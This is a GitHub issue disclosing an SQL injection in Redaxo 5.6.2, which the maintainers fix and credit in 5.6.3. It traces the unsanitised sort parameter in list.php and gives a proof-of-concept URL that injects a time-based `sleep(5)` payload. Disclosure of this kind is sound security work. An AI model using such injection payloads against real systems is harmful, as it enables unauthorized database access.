New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Sql Injection in Redaxo 5.6.2 #2043
Comments
|
Thx for the report. Will investigate. Since you already posted other security related bug reports: would you mind reporting those issues to the redaxo core team? We can/will give you the credit after we fixed it in a release. Thanks for your report! |
|
@staabm Of course not.But I don't know how to report these issues to the core team. |
|
For now, please report those errors to info@redaxo.de We are aware that we need a more secure channel, but we dont have such channel right now |
|
@staabm OK, I will send the follow-up security question to this email, I hope that you will fix it and give me credit as soon as possible. |
|
Just tagged 5.6.3 with a fix for the reported problem and credits for you in the changelog We will do a release announcement on redaxo.org , again giving you credits. Thx for the report |
|
@staabm OK. Thank you. |
details
in redaxo/src/core/lib/list.php:716
Called the getSortColumn function.View the function
in redaxo/src/core/lib/list.php:768
When the if condition is true, the function returns the value of the sort parameter obtained from the HTTP request.
Go back to the prepareQuery function above.
When the value of $sortColumn is not empty, $sortColumn is directly spliced into the SQL statement. Caused SQL injection.
Since this file (list.php) is used by many functions in this system. So there are a lot of SQL injections.

POC
Here I use mysql's time-based injection.

First visit http://localhost/redaxo/index.php?page=users/users
Click sort as shown:
At this point the URL becomes http://localhost/redaxo/index.php?page=users/users&6c9fee27_start=0&sort=login&sorttype=asc&list=6c9fee27
Change the URL as follows:
http://localhost/redaxo/index.php?page=users/users&6c9fee27_start=0&sort=login`,sleep(5),`login&sorttype=asc&list=6c9fee27
Then visit the URL and you will see a response delay of 15s

The complete SQL statement executed is
Credit: ADLab of VenusTech
The text was updated successfully, but these errors were encountered: